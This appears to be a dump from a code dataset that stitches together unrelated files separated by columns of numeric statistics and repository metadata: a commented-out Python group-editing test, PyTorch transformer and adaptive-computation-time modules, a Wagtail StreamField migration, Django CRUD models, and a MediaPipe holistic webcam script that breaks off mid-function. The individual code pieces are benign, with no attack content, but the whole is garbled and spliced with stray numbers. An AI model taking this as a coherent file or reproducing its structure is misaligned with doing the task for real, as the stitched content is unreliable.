# old_groups = app.group.get_group_list()
# group = Group(name="")
# if app.group.count() == 0:
# app.group.create(Group(name="Users"))
# app.group.edit_first_group(group)
# app.group.delete_first_group()
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
# else:
# index = randrange(len(old_groups))
# if app.group.empty_name(index):
# group.id = old_groups[index].id
# app.group.edit_group_by_index(index, group)
# assert len(old_groups) == app.group.count()
# new_groups = app.group.get_group_list()
# old_groups[index] = group
# assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
| 48.565574
| 133
| 0.582954
| 801
| 5,925
| 4.058677
| 0.088639
| 0.088588
| 0.059059
| 0.051676
| 0.851738
| 0.84128
| 0.830514
| 0.806829
| 0.792064
| 0.792064
| 0
| 0.001946
| 0.306329
| 5,925
| 121
| 134
| 48.966942
| 0.789051
| 0.225485
| 0
| 0.8
| 0
| 0
| 0.097497
| 0
| 0
| 0
| 0
| 0
| 0.15
| 1
| 0.0375
| false
| 0
| 0.0375
| 0
| 0.075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d6210edd53242f12fbb0b0534d1626cd7e8cb2bd
| 16,153
|
py
|
Python
|
transformers/transformer_models.py
|
TomMakkink/transformers-for-rl
|
9d025f92611e957004030af9ef05a07e320856a7
|
[
"MIT"
] | 1
|
2022-03-09T20:44:27.000Z
|
2022-03-09T20:44:27.000Z
|
transformers/transformer_models.py
|
TomMakkink/transformers-for-rl
|
9d025f92611e957004030af9ef05a07e320856a7
|
[
"MIT"
] | null | null | null |
transformers/transformer_models.py
|
TomMakkink/transformers-for-rl
|
9d025f92611e957004030af9ef05a07e320856a7
|
[
"MIT"
] | null | null | null |
import math
import torch
import torch.nn as nn
from torch.nn.init import xavier_uniform_
from transformers import PositionalEncoding, RelativeCoordinateEncoding
Tensor = torch.Tensor
class TransformerModel(nn.Module):
"""
Transformer baseclass.
"""
def __init__(
self,
d_model: int,
output_dim: int,
max_sequence_length: int,
submodule,
num_layers: int,
dropout: float,
) -> None:
"""
Args:
d_model: number of expected features in the input.
output_dim: output dimension of the model.
dropout: dropout. Default: 0.0.
"""
super(TransformerModel, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
self.pos_encoder = PositionalEncoding(
encoding_type="absolute", d_model=d_model, max_len=max_sequence_length
)
self.dropout = nn.Dropout(dropout)
self.d_model = d_model
self.submodules = nn.ModuleList([submodule for k in range(num_layers)])
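# Note: the ModuleList above holds the *same* submodule instance num_layers
# times, so all layers share parameters; use copy.deepcopy(submodule) per
# layer if independent weights are intended.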
self.out_layer = nn.Linear(d_model, output_dim)
self._init_network()
def _init_network(self):
r"""Initiate parameters in the transformer model."""
for p in self.parameters():
if p.dim() > 1:
xavier_uniform_(p)
def forward(self, x: Tensor):
"""
Args:
x: input tensor, of shape: [seq_len, batch_size, features]
Returns:
Transformer output, of shape: [seq_len, batch_size, output_dim]
"""
x = self.pos_encoder(x * math.sqrt(self.d_model))
attn_output_weights = []
for layer in self.submodules:
x, attn_output_weight = layer(x)
attn_output_weights.append(attn_output_weight)
attn_output_weights = torch.stack(attn_output_weights)
return self.out_layer(x), attn_output_weights
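# Minimal usage sketch. Any nn.Module whose forward returns a pair
# (output, attention_weights) fits the way the loop above unpacks layer(x);
# the stand-in below is hypothetical:
class _IdentitySubmodule(nn.Module):
    def forward(self, x):
        # Return the input unchanged plus dummy attention weights.
        return x, torch.zeros(x.size(1), x.size(0), x.size(0))

# model = TransformerModel(d_model=32, output_dim=4, max_sequence_length=128,
#                          submodule=_IdentitySubmodule(), num_layers=2,
#                          dropout=0.1)
# out, attn = model(torch.randn(10, 8, 32))  # [seq_len, batch, d_model]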
class MemoryTransformerModel(nn.Module):
"""
Transformer base model that uses memory.
"""
def __init__(
self,
d_model: int,
output_dim: int,
submodule,
num_layers: int,
num_heads: int,
mem_len: int,
dropout: float,
):
"""
Args:
d_model: number of expected features in the input.
output_dim = output dimension of the model.
"""
super(MemoryTransformerModel, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
dim_head = d_model // num_heads
self.drop = nn.Dropout(dropout)
self.mem_len = mem_len
self.num_layers = num_layers
self.positional_encoding_layer = PositionalEncoding(
encoding_type="relative",
d_model=d_model,
max_len=None,
)
self.u = nn.Parameter(torch.zeros(num_heads, dim_head))
self.v = nn.Parameter(torch.zeros(num_heads, dim_head))
self.submodules = nn.ModuleList([submodule for k in range(self.num_layers)])
self.output_layer = nn.Linear(d_model, output_dim, bias=False)
def init_mem(self):
if self.mem_len > 0:
mem = []
param = next(self.parameters())
for i in range(self.num_layers + 1):
empty = torch.empty(0, dtype=param.dtype, device=param.device)
mem.append(empty)
return mem
else:
return None
def _update_mem(self, hids, mem, qlen, mlen):
if mem is None:
return None
assert len(hids) == len(mem), "len(hids) != len(mem)"
with torch.no_grad():
new_mem = []
end_idx = mlen + max(0, qlen)
beg_idx = max(0, end_idx - self.mem_len)
for i in range(len(hids)):
cat = torch.cat([mem[i], hids[i]], dim=0)
new_mem.append(cat[beg_idx:end_idx].detach())
return new_mem
def forward(self, inputs: Tensor, mem: Tensor = None):
"""
Args:
inputs: input tensor, of shape: [source_seq_len, batch_size, features]
mem: memory from previous sequence.
Returns:
Transformer output, of shape: [target_seq_len, batch_size, output_dim]
"""
if not mem:
mem = self.init_mem()
qlen, bsz, _ = inputs.size()
mlen = mem[0].size(0) if mem is not None else 0
klen = mlen + qlen
hids = []
pos_seq = torch.arange(
klen - 1, -1, -1.0, dtype=inputs.dtype, device=inputs.device
)
pos_emb = self.positional_encoding_layer(pos_seq)
core_out = self.drop(inputs)
pos_emb = self.drop(pos_emb)
attn_output_weights = []
hids.append(core_out)
for i, layer in enumerate(self.submodules):
mem_i = None if mem is None else mem[i]
core_out, attn_output_weight = layer(
core_out,
pos_emb,
self.u,
self.v,
attn_mask=None,
mem=mem_i,
)
hids.append(core_out)
attn_output_weights.append(attn_output_weight)
attn_output_weights = torch.stack(attn_output_weights)
core_out = self.drop(core_out)
core_out = self.output_layer(core_out)
new_mem = self._update_mem(hids, mem, qlen, mlen)  # match the (qlen, mlen) parameter order
return core_out, attn_output_weights, new_mem
def reset(self):
self.init_mem()
for layer in self.submodules:
layer.reset()
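# Segment-level recurrence sketch (usage assumed): the memory returned by one
# forward pass is fed back on the next call, so every segment can attend over
# up to mem_len cached hidden states from earlier segments.
# mem = None
# for segment in segments:                  # each: [seq_len, batch, d_model]
#     out, attn, mem = model(segment, mem)  # mem is a per-layer cache list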
class AdaptiveComputationalTime(nn.Module):
"""
Adaptive Computational Time: https://arxiv.org/abs/1603.08983.
"""
def __init__(
self,
d_model: int,
output_dim: int,
submodule,
max_sequence_length: int,
max_act_timesteps: int,
halting_threshold: float,
):
"""
Args:
"""
super(AdaptiveComputationalTime, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
self.pos_encoder = PositionalEncoding(
encoding_type="coordinate",
d_model=d_model,
max_len=max_sequence_length,
)
self.halting_threshold = halting_threshold
self.max_act_timesteps = max_act_timesteps
self.transition = nn.Linear(d_model, 1)
self.sigma = nn.Sigmoid()
# self.submodules = nn.ModuleList()  # unused alternative kept for reference
self.submodule = submodule
self.out_layer = nn.Linear(d_model, output_dim)
def forward(self, inputs: Tensor):
"""
Args:
inputs shape: (sequence_length, batch_size, feature_dim)
"""
halting_probability = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
remainders = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
n_updates = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
previous_state = torch.zeros_like(inputs, device=inputs.device)
step = 0
state = inputs
attn_output_weights = []
while (
(
(halting_probability < self.halting_threshold)
& (n_updates < self.max_act_timesteps)
)
.byte()
.any()
):
# Add coordinate embeddings to the state
state = self.pos_encoder(state)
# Calculate halting probabilities based on the state
p = self.sigma(self.transition(state)).squeeze(-1)
# Mask for inputs which have not halted yet
still_running = (halting_probability < 1.0).float()
# Mask of inputs which halted at this step
new_halted = (
halting_probability + p * still_running > self.halting_threshold
).float() * still_running
# Mask of inputs which haven't halted, and didn't halt this step
still_running = (
halting_probability + p * still_running <= self.halting_threshold
).float() * still_running
# Add the halting probability for this step to the halting
# probabilities for those inputs which haven't halted yet
halting_probability = halting_probability + p * still_running
# Compute remainders for the inputs which halted at this step
remainders = remainders + new_halted * (1 - halting_probability)
# Add the remainders to those inputs which halted at this step
halting_probability = halting_probability + new_halted * remainders
# Increment n_updates for all inputs which are still running
n_updates = n_updates + still_running + new_halted
# Compute the weight to be applied to the new state and output
# 0 when the input has already halted
# p when the input hasn't halted yet
# the remainders when it halted this step
update_weights = p * still_running + new_halted * remainders
state, attn_output_weight = self.submodule(state)
attn_output_weights.append(attn_output_weight)
# update running part in the weighted state and keep the rest
previous_state = (state * update_weights.unsqueeze(-1)) + (
previous_state * (1 - update_weights.unsqueeze(-1))
)
step += 1
attn_output_weights = torch.stack(attn_output_weights)
meta_info = {"remainders": remainders, "n_updates": n_updates, "step": step}
return previous_state, attn_output_weights, meta_info
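# Tiny numeric illustration of the halting bookkeeping above, for a single
# position with halting_threshold = 0.99 (plain tensor arithmetic, no model):
_halt = torch.tensor([0.0])
_p = torch.tensor([0.6])
_still = (_halt < 1.0).float()                                # 1.0: still running
_new_halted = ((_halt + _p * _still) > 0.99).float() * _still  # 0.0: 0.6 <= 0.99
_halt = _halt + _p * _still                                   # accumulates to 0.6
# On a later step with p = 0.7, halt + p = 1.3 > 0.99, so the position halts;
# the remainder 1 - 0.6 = 0.4 becomes that step's update weight.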
class ACTMemory(nn.Module):
"""
Adaptive Computational Time: https://arxiv.org/abs/1603.08983.
"""
def __init__(
self,
d_model: int,
output_dim: int,
num_heads: int,
submodule,
max_act_timesteps: int,
halting_threshold: float,
mem_len: int,
dropout: float,
):
"""
Args:
"""
super(ACTMemory, self).__init__()
assert isinstance(submodule, nn.Module), "Invalid Transformer submodule. "
self.halting_threshold = halting_threshold
self.max_act_timesteps = max_act_timesteps
self.transition = nn.Linear(d_model, 1)
self.sigma = nn.Sigmoid()
dim_head = d_model // num_heads
self.drop = nn.Dropout(dropout)
self.mem_len = mem_len
self.positional_encoding_layer = RelativeCoordinateEncoding(d_model=d_model)
self.u = nn.Parameter(torch.zeros(num_heads, dim_head))
self.v = nn.Parameter(torch.zeros(num_heads, dim_head))
self.submodule = submodule
self.output_layer = nn.Linear(d_model, output_dim)
def init_mem(self):
if self.mem_len > 0:
mem = []
param = next(self.parameters())
for i in range(self.max_act_timesteps + 1):
empty = torch.empty(0, dtype=param.dtype, device=param.device)
mem.append(empty)
return mem
else:
return None
def _update_mem(self, hids, mem, qlen, mlen):
if mem is None:
return None
# Pad hidden cells that have not been filled
hids_len = len(hids)
for i in range(hids_len, self.max_act_timesteps + 1):
zero_tensor = torch.zeros(
size=(hids[0].shape), dtype=hids[0].dtype, device=hids[0].device
)
hids.append(zero_tensor)
assert len(hids) == len(mem), "len(hids) != len(mem)"
with torch.no_grad():
new_mem = []
end_idx = mlen + max(0, qlen)
beg_idx = max(0, end_idx - self.mem_len)
for i in range(len(hids)):
cat = torch.cat([mem[i], hids[i]], dim=0)
new_mem.append(cat[beg_idx:end_idx].detach())
return new_mem
def forward(self, inputs: Tensor, mem: Tensor = None):
"""
Args:
inputs shape: (sequence_length, batch_size, feature_dim)
"""
if not mem:
mem = self.init_mem()
qlen, bsz, _ = inputs.size()
mlen = mem[0].size(0) if mem is not None else 0
klen = mlen + qlen
hids = []
pos_seq = torch.arange(
klen - 1, -1, -1.0, dtype=inputs.dtype, device=inputs.device
)
state = self.drop(inputs)
hids.append(state)
halting_probability = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
remainders = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
n_updates = torch.zeros(
size=(inputs.shape[0], inputs.shape[1]), device=inputs.device
)
previous_state = torch.zeros_like(inputs, device=inputs.device)
step = 0
# state = inputs
attn_output_weights = []
while (
(
(halting_probability < self.halting_threshold)
& (n_updates < self.max_act_timesteps)
)
.byte()
.any()
):
# Add coordinate embeddings to the state
pos_emb, time_emb = self.positional_encoding_layer(state, pos_seq)
# Calculate halting probabilities based on the state
p = self.sigma(self.transition(state)).squeeze(-1)
# Mask for inputs which have not halted yet
still_running = (halting_probability < 1.0).float()
# Mask of inputs which halted at this step
new_halted = (
halting_probability + p * still_running > self.halting_threshold
).float() * still_running
# Mask of inputs which haven't halted, and didn't halt this step
still_running = (
halting_probability + p * still_running <= self.halting_threshold
).float() * still_running
# Add the halting probability for this step to the halting
# probabilities for those inputs which haven't halted yet
halting_probability = halting_probability + p * still_running
# Compute remainders for the inputs which halted at this step
remainders = remainders + new_halted * (1 - halting_probability)
# Add the remainders to those inputs which halted at this step
halting_probability = halting_probability + new_halted * remainders
# Increment n_updates for all inputs which are still running
n_updates = n_updates + still_running + new_halted
# Compute the weight to be applied to the new state and output
# 0 when the input has already halted
# p when the input hasn't halted yet
# the remainders when it halted this step
update_weights = p * still_running + new_halted * remainders
mem_i = None if mem is None else mem[step]
state, attn_output_weight = self.submodule(
state,
pos_emb,
self.u,
self.v,
attn_mask=None,
mem=mem_i,
)
hids.append(state)
attn_output_weights.append(attn_output_weight)
# update running part in the weighted state and keep the rest
previous_state = (state * update_weights.unsqueeze(-1)) + (
previous_state * (1 - update_weights.unsqueeze(-1))
)
step += 1
attn_output_weights = torch.stack(attn_output_weights)
new_mem = self._update_mem(hids, mem, qlen, mlen)  # match the (qlen, mlen) parameter order
core_out = self.output_layer(previous_state)
return core_out, attn_output_weights, new_mem
def reset(self):
self.submodule.reset()
| 34.006316
| 84
| 0.582369
| 1,902
| 16,153
| 4.737119
| 0.111462
| 0.031077
| 0.037736
| 0.009323
| 0.820644
| 0.771032
| 0.746393
| 0.729634
| 0.729301
| 0.677248
| 0
| 0.007844
| 0.329103
| 16,153
| 474
| 85
| 34.078059
| 0.823567
| 0.159908
| 0
| 0.712934
| 0
| 0
| 0.016318
| 0
| 0
| 0
| 0
| 0
| 0.018927
| 1
| 0.047319
| false
| 0
| 0.015773
| 0
| 0.113565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3ac2f2e7ba9f3605cbe311ad5cf6c302cf91760
| 4,719
|
py
|
Python
|
simple/migrations/0002_auto_20170809_2141.py
|
littleweaver/wagtail-project-template
|
34d9b2f659fab2c530902b650e2fc76410b8a22f
|
[
"BSD-3-Clause"
] | 12
|
2018-04-20T20:06:48.000Z
|
2022-03-23T08:11:11.000Z
|
simple/migrations/0002_auto_20170809_2141.py
|
littleweaver/wagtail-project-template
|
34d9b2f659fab2c530902b650e2fc76410b8a22f
|
[
"BSD-3-Clause"
] | 16
|
2018-03-09T22:30:35.000Z
|
2021-09-07T23:36:05.000Z
|
simple/migrations/0002_auto_20170809_2141.py
|
littleweaver/wagtail-project-template
|
34d9b2f659fab2c530902b650e2fc76410b8a22f
|
[
"BSD-3-Clause"
] | 1
|
2019-08-02T20:17:35.000Z
|
2019-08-02T20:17:35.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-09 21:41
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('simple', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='simplepage',
name='body',
field=wagtail.core.fields.StreamField((('text', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('background_color', wagtail.core.blocks.ChoiceBlock(choices=[('white', 'White'), ('eastern-blue', 'Eastern Blue'), ('gamboge', 'Gamboge'), ('green', 'Green'), ('pink', 'Pink'), ('red', 'Red'), ('royal-blue', 'Royal Blue'), ('teal', 'Teal'), ('violet', 'Violet'), ('dark-gray', 'Dark Gray')])), ('text_align', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('center', 'Center'), ('right', 'Right')])), ('font_size', wagtail.core.blocks.ChoiceBlock(choices=[('small', 'Small'), ('normal', 'Normal'), ('large', 'Large'), ('jumbo', 'Jumbo')])), ('font_family', wagtail.core.blocks.ChoiceBlock(choices=[('sans-serif', 'Sans Serif'), ('serif', 'Serif')]))), label='Text', template='common/blocks/styled_text_full_bleed.html')), ('image', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('raw_html', wagtail.core.blocks.RawHTMLBlock()), ('blockquote', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('source_text', wagtail.core.blocks.RichTextBlock(required=False)), ('source_url', wagtail.core.blocks.URLBlock(help_text='Source text will link to this url.', required=False))))), ('list', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(label='List Item'), template='common/blocks/list_block_columns.html')), ('video', wagtail.core.blocks.StructBlock((('video', wagtail.embeds.blocks.EmbedBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('heading_1', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_2', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_3', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))))),
),
migrations.AlterField(
model_name='simplepagewithmenusidebar',
name='body',
field=wagtail.core.fields.StreamField((('text', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('background_color', wagtail.core.blocks.ChoiceBlock(choices=[('white', 'White'), ('eastern-blue', 'Eastern Blue'), ('gamboge', 'Gamboge'), ('green', 'Green'), ('pink', 'Pink'), ('red', 'Red'), ('royal-blue', 'Royal Blue'), ('teal', 'Teal'), ('violet', 'Violet'), ('dark-gray', 'Dark Gray')])), ('text_align', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('center', 'Center'), ('right', 'Right')])), ('font_size', wagtail.core.blocks.ChoiceBlock(choices=[('small', 'Small'), ('normal', 'Normal'), ('large', 'Large'), ('jumbo', 'Jumbo')])), ('font_family', wagtail.core.blocks.ChoiceBlock(choices=[('sans-serif', 'Sans Serif'), ('serif', 'Serif')]))), label='Text')), ('image', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('raw_html', wagtail.core.blocks.RawHTMLBlock()), ('blockquote', wagtail.core.blocks.StructBlock((('text', wagtail.core.blocks.RichTextBlock()), ('source_text', wagtail.core.blocks.RichTextBlock(required=False)), ('source_url', wagtail.core.blocks.URLBlock(help_text='Source text will link to this url.', required=False))))), ('list', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(label='List Item'), template='common/blocks/list_block_columns.html')), ('video', wagtail.core.blocks.StructBlock((('video', wagtail.embeds.blocks.EmbedBlock()), ('alignment', wagtail.core.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right'), ('full-width', 'Full Width')]))))), ('heading_1', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_2', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))), ('heading_3', wagtail.core.blocks.StructBlock((('content', wagtail.core.blocks.CharBlock()),))))),
),
]
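The frozen definitions above mirror a StreamField declared on the page models. A rough model-side sketch follows (abridged: only a few of the blocks are shown, and the exact class body is an assumption, not the project's actual models.py):

from wagtail.core import blocks
from wagtail.core.fields import StreamField
from wagtail.core.models import Page


class SimplePageWithMenuSidebar(Page):
    # Model name taken from the migration; the block list is abridged.
    body = StreamField([
        ('text', blocks.StructBlock([
            ('text', blocks.RichTextBlock()),
            ('text_align', blocks.ChoiceBlock(choices=[
                ('left', 'Left'), ('center', 'Center'), ('right', 'Right'),
            ])),
        ], label='Text')),
        ('raw_html', blocks.RawHTMLBlock()),
        ('heading_1', blocks.StructBlock([('content', blocks.CharBlock())])),
    ])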
| 157.3
| 2,079
| 0.680017
| 536
| 4,719
| 5.91791
| 0.205224
| 0.173392
| 0.251892
| 0.123581
| 0.871375
| 0.871375
| 0.871375
| 0.871375
| 0.871375
| 0.871375
| 0
| 0.00623
| 0.081585
| 4,719
| 29
| 2,080
| 162.724138
| 0.725658
| 0.01441
| 0
| 0.272727
| 1
| 0
| 0.271084
| 0.03012
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.272727
| 0
| 0.409091
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c3ee00df15a8824ea7ba3f779e43593ff8eee6db
| 1,378
|
py
|
Python
|
vue_crud_data/models.py
|
TakeshiOkamoto/mpp_vue_crud_dj
|
b09c39e82c014c842de66ed86b86c519962e5284
|
[
"Unlicense"
] | null | null | null |
vue_crud_data/models.py
|
TakeshiOkamoto/mpp_vue_crud_dj
|
b09c39e82c014c842de66ed86b86c519962e5284
|
[
"Unlicense"
] | null | null | null |
vue_crud_data/models.py
|
TakeshiOkamoto/mpp_vue_crud_dj
|
b09c39e82c014c842de66ed86b86c519962e5284
|
[
"Unlicense"
] | null | null | null |
from django.db import models
from django.core.validators import MaxLengthValidator


# CRUD
class VueCrudData(models.Model):
    class Meta:
        db_table = 'vue_crud_data'
        verbose_name = 'CRUD'

    # Name
    name = models.CharField(verbose_name='Name',
                            max_length=100, default='',
                            validators=[MaxLengthValidator(100)])
    # Comment
    comment = models.TextField(verbose_name='Comment',
                               max_length=1000, default='',
                               validators=[MaxLengthValidator(1000)])
    # Creation timestamp
    created_at = models.DateTimeField(auto_now_add=True)
    # Update timestamp
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self):
        return '<id=' + str(self.id) + ', name=' + self.name + '>'


# CRUD (backup)
class VueCrudDataBk(models.Model):
    class Meta:
        db_table = 'vue_crud_data_bk'
        verbose_name = 'CRUD(BK)'

    # Name
    name = models.CharField(verbose_name='Name',
                            max_length=100, default='',
                            validators=[MaxLengthValidator(100)])
    # Comment
    comment = models.TextField(verbose_name='Comment',
                               max_length=1000, default='',
                               validators=[MaxLengthValidator(1000)])
    # Creation timestamp
    created_at = models.DateTimeField(auto_now_add=True)
    # Update timestamp
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self):
        return '<id=' + str(self.id) + ', name=' + self.name + '>'
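A minimal usage sketch for these models (assumes a configured Django project with migrations applied; the values are illustrative):

from vue_crud_data.models import VueCrudData

# Create a row; created_at and updated_at are filled automatically.
row = VueCrudData.objects.create(name='Taro', comment='First entry')

# auto_now=True refreshes updated_at on every save.
row.comment = 'Edited entry'
row.save()

print(row)  # e.g. <id=1, name=Taro>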
| 26
| 66
| 0.632075
| 156
| 1,378
| 5.358974
| 0.288462
| 0.078947
| 0.167464
| 0.119617
| 0.820574
| 0.820574
| 0.820574
| 0.820574
| 0.820574
| 0.729665
| 0
| 0.026515
| 0.233672
| 1,378
| 52
| 67
| 26.5
| 0.765152
| 0.035559
| 0
| 0.733333
| 0
| 0
| 0.058422
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.066667
| 0.066667
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
61681495be2c98af574716b5dea48d768223ae8c
| 12,164
|
py
|
Python
|
holistic.py
|
anmolmalik01/mediapipe
|
703bb138bc9a3aab7a0b9514708f4ae2fb98fba6
|
[
"MIT"
] | 1
|
2021-12-10T18:20:08.000Z
|
2021-12-10T18:20:08.000Z
|
holistic.py
|
anmolmalik01/mediapipe
|
703bb138bc9a3aab7a0b9514708f4ae2fb98fba6
|
[
"MIT"
] | null | null | null |
holistic.py
|
anmolmalik01/mediapipe
|
703bb138bc9a3aab7a0b9514708f4ae2fb98fba6
|
[
"MIT"
] | null | null | null |
import cv2
import mediapipe as mp
import time
class mediapipe:
# ============================================ init =================================================
def __init__(self):
# mediapipe solutions variable
mp_drawing = mp.solutions.drawing_utils
mp_holistic = mp.solutions.holistic
mp_drawing_styles = mp.solutions.drawing_styles
mp_face_detection = mp.solutions.face_detection
mp_face_mesh = mp.solutions.face_mesh
mp_hands = mp.solutions.hands
mp_pose = mp.solutions.pose
pTime = 0
self.mp_drawing = mp_drawing
self.mp_holistic = mp_holistic
self.mp_drawing_styles = mp_drawing_styles
self.mp_face_detection = mp_face_detection
self.mp_hands = mp_hands
self.mp_pose = mp_pose
self.mp_face_mesh = mp_face_mesh
self.pTime = pTime
# ===================================================================================================
def simple_holistic(self, show_fps=False):
# capturing webcam 0
cap = cv2.VideoCapture(0)
# Initiate holistic model
with self.mp_holistic.Holistic( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as holistic:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
continue
# Recolor Feed
image.flags.writeable = False
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Make Detections
results = holistic.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# face landmarks
self.mp_drawing.draw_landmarks(
image,
results.face_landmarks,
self.mp_holistic.FACEMESH_CONTOURS,
landmark_drawing_spec=None,
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0, 167, 196), thickness=2, circle_radius=1)
)
# pose landmarks
self.mp_drawing.draw_landmarks(
image,
results.pose_landmarks,
self.mp_holistic.POSE_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0,0,0), thickness=2, circle_radius=2),
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(255, 255, 255), thickness=3, circle_radius=2)
)
                # flipping image
                flip_image = cv2.flip(image, 1)
                # fps
                if show_fps:
                    cTime = time.time()
                    fps = 1 / (cTime - self.pTime)
                    self.pTime = cTime
                    cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
                # showing image
                cv2.imshow('MediaPipe Holistic', flip_image)
                # quitting
                if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ===================================================================================================
def complex_holistic(self, show_fps=True):
# capturing webcam 0
cap = cv2.VideoCapture(0)
# Initiate holistic model
with self.mp_holistic.Holistic( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as holistic:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
continue
# Recolor Feed
image.flags.writeable = False
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Make Detections
results = holistic.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# face landmarks
self.mp_drawing.draw_landmarks(
image,
results.face_landmarks,
self.mp_holistic.FACEMESH_TESSELATION,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=1, circle_radius=1),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=1, circle_radius=1)
)
# Right hand
self.mp_drawing.draw_landmarks(
image,
results.right_hand_landmarks,
self.mp_holistic.HAND_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(0, 0, 0), thickness=3, circle_radius=3),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=2, circle_radius=2)
)
# Left Hand
self.mp_drawing.draw_landmarks(
image,
results.left_hand_landmarks,
self.mp_holistic.HAND_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(0, 0, 0), thickness=3, circle_radius=3),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=2, circle_radius=2)
)
# Pose landmarks
self.mp_drawing.draw_landmarks(
image,
results.pose_landmarks,
self.mp_holistic.POSE_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0,0,0), thickness=2, circle_radius=2),
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(255, 255, 255), thickness=3, circle_radius=2)
)
                # flipping image
                flip_image = cv2.flip(image, 1)
                # fps
                if show_fps:
                    cTime = time.time()
                    fps = 1 / (cTime - self.pTime)
                    self.pTime = cTime
